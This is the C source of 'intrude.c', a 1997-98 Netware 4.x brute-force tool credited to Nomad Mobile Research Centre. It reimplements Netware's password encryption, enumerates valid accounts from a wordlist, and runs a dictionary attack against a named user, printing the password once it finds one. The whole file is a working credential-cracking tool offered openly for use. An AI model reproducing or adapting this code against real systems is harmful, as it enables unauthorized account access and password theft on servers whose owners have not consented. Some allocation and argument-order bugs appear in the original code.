/*************************************************************************
 *                                                                       *
 * intrude.c  - Attack accounts on a Netware 4.x server.                 *
 *                                                                       *
 * Programmer - Simple Nomad - Nomad Mobile Research Centre              *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/3/97     - Initial Revision                                         *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 2/24/98    - Code cleanup. Support for header file.                   *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 3/11/98    - More minor bug fixes. Removed a couple of old routines   *
 *              not being used.                                          *
 *                                                                       *
 *************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#include <dos.h>
#include "globals.h"

/*
   encryptp : create encrypted password from userid, and password
   getpassk : create login data from encrypted password & logkey
*/

#define MAXPWLEN 64
#define MAXNAMELEN 48
typedef unsigned char u_char;

u_char logkey[8];
int key=FALSE;

u_char tab0[256]=  /* used by encrypt */
{/* 0   1   2   3   4   5   6   7   8   9   a   b   c   d   e   f  */
   0x7,0x8,0x0,0x8,0x6,0x4,0xE,0x4,0x5,0xC,0x1,0x7,0xB,0xF,0xA,0x8,
   0xF,0x8,0xC,0xC,0x9,0x4,0x1,0xE,0x4,0x6,0x2,0x4,0x0,0xA,0xB,0x9,
   0x2,0xF,0xB,0x1,0xD,0x2,0x1,0x9,0x5,0xE,0x7,0x0,0x0,0x2,0x6,0x6,
   0x0,0x7,0x3,0x8,0x2,0x9,0x3,0xF,0x7,0xF,0xC,0xF,0x6,0x4,0xA,0x0,
   0x2,0x3,0xA,0xB,0xD,0x8,0x3,0xA,0x1,0x7,0xC,0xF,0x1,0x8,0x9,0xD,
   0x9,0x1,0x9,0x4,0xE,0x4,0xC,0x5,0x5,0xC,0x8,0xB,0x2,0x3,0x9,0xE,
   0x7,0x7,0x6,0x9,0xE,0xF,0xC,0x8,0xD,0x1,0xA,0x6,0xE,0xD,0x0,0x7,
   0x7,0xA,0x0,0x1,0xF,0x5,0x4,0xB,0x7,0xB,0xE,0xC,0x9,0x5,0xD,0x1,
   0xB,0xD,0x1,0x3,0x5,0xD,0xE,0x6,0x3,0x0,0xB,0xB,0xF,0x3,0x6,0x4,
   0x9,0xD,0xA,0x3,0x1,0x4,0x9,0x4,0x8,0x3,0xB,0xE,0x5,0x0,0x5,0x2,
   0xC,0xB,0xD,0x5,0xD,0x5,0xD,0x2,0xD,0x9,0xA,0xC,0xA,0x0,0xB,0x3,
   0x5,0x3,0x6,0x9,0x5,0x1,0xE,0xE,0x0,0xE,0x8,0x2,0xD,0x2,0x2,0x0,
   0x4,0xF,0x8,0x5,0x9,0x6,0x8,0x6,0xB,0xA,0xB,0xF,0x0,0x7,0x2,0x8,
   0xC,0x7,0x3,0xA,0x1,0x4,0x2,0x5,0xF,0x7,0xA,0xC,0xE,0x5,0x9,0x3,
   0xE,0x7,0x1,0x2,0xE,0x1,0xF,0x4,0xA,0x6,0xC,0x6,0xF,0x4,0x3,0x0,
   0xC,0x0,0x3,0x6,0xF,0x8,0x7,0xB,0x2,0xD,0xC,0x6,0xA,0xA,0x8,0xD
};

u_char tab[32]=   /* used by encrypt & encryptp */
{
  0x48,0x93,0x46,0x67,0x98,0x3D,0xE6,0x8D,0xB7,0x10,0x7A,0x26,0x5A,0xB9,0xB1,0x35,
  0x6B,0x0F,0xD5,0x70,0xAE,0xFB,0xAD,0x11,0xF4,0x47,0xDC,0xA7,0xEC,0xCF,0x50,0xC0
};

/* char p1[32]  : password xored with ID and itself ...
 * char p2[16]  : encrypted password (result)
 */
void encrypt(register u_char *p1, u_char *p2)  /* changes both p1 & p2 */
{
  int j,i;
  u_char a;
  u_char c=0;
  for (j=0 ; j<2 ; j++)
    for (i=0 ; i<32 ; i++)
    {
      a=(p1[(i+c)&0x1f] - tab[i]) ^ (p1[i]+c);
      c+=a;
      p1[i]=a;
    }
  memset(p2,0,16);
  for (i=0 ; i<32 ; i++)
    if (i&1)
      p2[i/2] |= tab0[p1[i]]<<4;
    else
      p2[i/2] |= tab0[p1[i]];
}

/* char id[4]    : UserID
 * char src[len] : unencrypted password
 * int len       : length of unencrypted password
 * char dst[16]  : encrypted password (result)
 */
void encryptp(long id, u_char *src, int len, u_char *dst)
{
  u_char buf[32];
  u_char *p;
  u_char *q=src;
  int i;
  for (p=q+len-1 ; *p--==0 && len ; len--)
    ;
  memset(buf,0,32);
  for ( ; len>=32 ; len-=32)
    for (i=0 ; i<32 ; q++, i++)
      buf[i] ^= *q;
  p=q;
  if (len>0)
    for (i=0 ; i<32 ; i++)
    {
      if (q+len==p)
      {
	p=q;
	buf[i]^=tab[i];
      }
      else
	buf[i]^=*p++;
    }
  for (i=0 ; i<32 ; i++)
    buf[i] ^= ((u_char *)&id)[i&3];
  encrypt(buf,dst);
}

/* char logkey[8] : (requested with int21,ax=e3, fn 17 from server)
 * char crpw[16]  : encrypted password (with encryptp)
 * char dst[8]    : login data (result)
 */
void getpassk(long *logkey, u_char *crpw, u_char *dst)
{
  u_char buf[32];
  int i,j;
  encryptp(logkey[0],crpw,16,buf);
  encryptp(logkey[1],crpw,16,buf+16);
  for (i=0, j=31 ; i<16 ; i++, j--)
    buf[i]^=buf[j];
  for (i=0 , j=15 ; i<8 ; i++, j--)
    dst[i]=buf[i]^buf[j];
}

/*
 * Do the int21
 */
int shreq(int f, u_char *req, int rl, u_char *ans, int al)
{
  struct REGPACK r;
  r.r_cx=rl;
  r.r_dx=al;
  r.r_si=FP_OFF(req);
  r.r_di=FP_OFF(ans);
  r.r_ds=FP_SEG(req);
  r.r_es=FP_SEG(ans);
  r.r_ax=0xf200|f;
  intr(0x21,&r);
  return(r.r_ax&0xff);
}

/*
 * Get login key from server
 */
int getlogkey(u_char *s)
{
  u_char req[3];
  req[0]=0; req[1]=1; req[2]=0x17;
  return(shreq(0x17,req,3,s,8));
}

/*
 * Get Object ID from server
 */
int getobjid(char *name, int type, long *id)
{
  u_char req[MAXNAMELEN+6];
  u_char rep[MAXNAMELEN+6];
  int err;
  req[2]=0x35;
  *(int *)(req+3)=type;
  req[5]=strlen(name);
  strncpy((char *)req+6,name,MAXNAMELEN);
  req[0]=0;
  req[1]=req[5]+4;
  err=shreq(0x17,req,req[1]+2,rep,MAXNAMELEN+6);
  *id=*(long *)rep;
  return(err);
}

int trypw(char *pw, int type, char *name)
{
  u_char req[7+MAXNAMELEN+MAXPWLEN];
  req[2]=0x3f;
  *(int *)(req+3)=type;
  req[5]=strlen(name);
  strncpy((char *)req+6,name,MAXNAMELEN);
  req[6+req[5]]=strlen(pw);
  strncpy((char *)req+7+req[5],pw,MAXPWLEN);
  req[0]=0;
  req[1]=5+req[5]+req[6+req[5]];
  return(shreq(0x17,req,req[1]+2,req,0));
}

int trypwcrypt(u_char *crpw, int type, char *name)
{
  u_char req[14+MAXNAMELEN];
  req[2]=0x4a;
  memcpy(req+3,crpw,8);
  *(int *)(req+11)=type;
  req[13]=strlen(name);
  strncpy((char *)req+14,name,MAXNAMELEN);
  req[0]=0;
  req[1]=12+req[13];
  return(shreq(0x17,req,req[1]+2,req,0));
}

int testpw(char *name, int type, char *pw)
{
  long id;
  u_char crpw[16];
  int err;

  if (key==FALSE)
  {
    if (getlogkey(logkey)!=0)
      return(trypw(name,type,pw));
    else
      key=TRUE;
  }
  err=getobjid(name,type,&id);
  if (err)
    return (err);
  encryptp(id,(u_char *)pw,strlen(pw),crpw);
  getpassk((long *)logkey,crpw,logkey);
  return(trypwcrypt(logkey,type,name));
}

/*
 * Set connection id
 */
int setconn(int c)
{
  struct REGPACK r;
  r.r_ax=0xf000;  /* set preferred connection nr */
  r.r_dx=c+1;
  intr(0x21,&r);
  return(r.r_ax&0xff);
}

/*
 * print usage if needed
 */
void printHelp(int j, char *i)
{
   if (j==2) printf("No argument given for option %s\n",i);
   printf("USAGE: intrude <options>\n");
   printf("  -a            Check a wordlist containing possible ACCOUNT names.\n");
   printf("  -h            This HELP screen.\n");
   printf("  -u            Dictionary attack the USER specified.\n");
   printf("  -v            VERBOSE to show progress.\n");
   printf("  -w            WORDLIST for -a or -u options.\n\n");
   printf("EXAMPLE:\n");
   printf("  intrude -a -w accounts.txt\n");
   printf("  intrude -u Admin -w diction.ary\n\n");
   exit(j);
}

/*
 * Main prog
 */
void main(int argc, char **argv)
{
  FILE *f;
  char pw[MAXPWLEN];
  int err,i,mode=0,verbose,FOUND=FALSE;
  char *words,*user,*wordlist,*readaword;

  wordlist = calloc(sizeof(wordlist), 1);
  readaword = calloc(sizeof(readaword), 1);
  words = calloc(sizeof(words), 1);
  user = calloc(sizeof(user), 1);

  err=setconn(0);
  if (err)
    printf("failed setconn : %02x\n",err);

  /* say hello... */
  printf("INTRUDE - Netware 4.x Brute Force Intruder\n");
  printf("Comments/bugs: pandora@nmrc.org\n");
  printf("http://www.nmrc.org/pandora\n");
  printf("1997,1998 (c) Nomad Mobile Research Centre\n\n");

  if (argc<3) printHelp(1,0);

  /* process command line */
  for (i=1 ; i<argc ; i++)
  {
     if (argv[i][0]=='-')
	 switch(argv[i][1])
	 {
	    case 'a':
	    case 'A':
	       mode=1;
	       break;
	    case 'u':
	    case 'U':
	       user=argv[i+1];
	       mode=2;
	       break;
	    case 'v':
	    case 'V':
	       verbose=TRUE;
	       break;
	    case 'w':
	    case 'W':
	       wordlist=argv[i+1];
	       break;
	    case 'h':
	    case 'H':
            case '?':
	       printHelp(0,0);
	    default:
	       printf("Invalid option: %s\n", argv[i]);
	       printHelp(1,0);
	 }
  }
  /* post command line processing */
  if (mode==0 || wordlist==NULL)
    printHelp(2,"w");

  switch(mode)
  {
    case 1:
      f=fopen(wordlist, "r");
      if (f==NULL)
      {
	printf("Unable to open %s\n",wordlist);
	perror("Error");
	exit(-1);
      }

      /* the crack loop -- break out if done */
      while (!feof(f))
      {
	if(kbhit());
	fgets(readaword, 80, f);
	sscanf(readaword,"%s%*c",words);
	err=testpw(words,0x100,NULL);
	if (err==0||err==255)
	{
	  printf("%s is a valid account",words);
	  if (err==0)
	    printf(" -- no password");
	  printf(".\n");
	}
      };
      break;
    case 2:
	err=testpw(user,0x100,NULL);
	if (err==0)
	{
	  FOUND=TRUE;
	  words=NULL;
	  break;
	}
	if (err==0xfc)
	{
	  printf("User %s is not a valid account.\n",user);
	  exit(1);
	}
	/* open the dictionary */
	f=fopen(wordlist, "r");
	if (f==NULL)
	{
	  printf("Unable to open %s\n",wordlist);
	  perror("Error");
	  exit(1);
	}

	/* the crack loop -- break out if done or the password found */
	while (!feof(f))
	{
	  if(kbhit());
	  fgets(readaword, 80, f);
	  sscanf(readaword,"%s%*c",words);
	  for (i=0;i<strlen(words);i++)
	    words[i]=toupper(words[i]); /* convert lower case letters
					 to upper case letters */
	  if (verbose==TRUE)
	    printf("%s\n",words);
	  err=testpw(user,0x100,words);
	  if (err==0)
	  {
	    FOUND=TRUE;
	    break;
	  }
	};
	break;
    case 0:
    default: /*  Need help */
      printHelp(1,0);
  }
  if (f) fclose(f);

  /* print it if we found it, otherwise give the bad news */
  if (mode==1) exit(0);
  if (FOUND==TRUE)
  {
    printf("%s's password is ",user);
    if (words==NULL) printf("NULL.\n");
    else printf("%s\n",words);
  }
  else
    printf("%s's password not found.\n",user);
} 
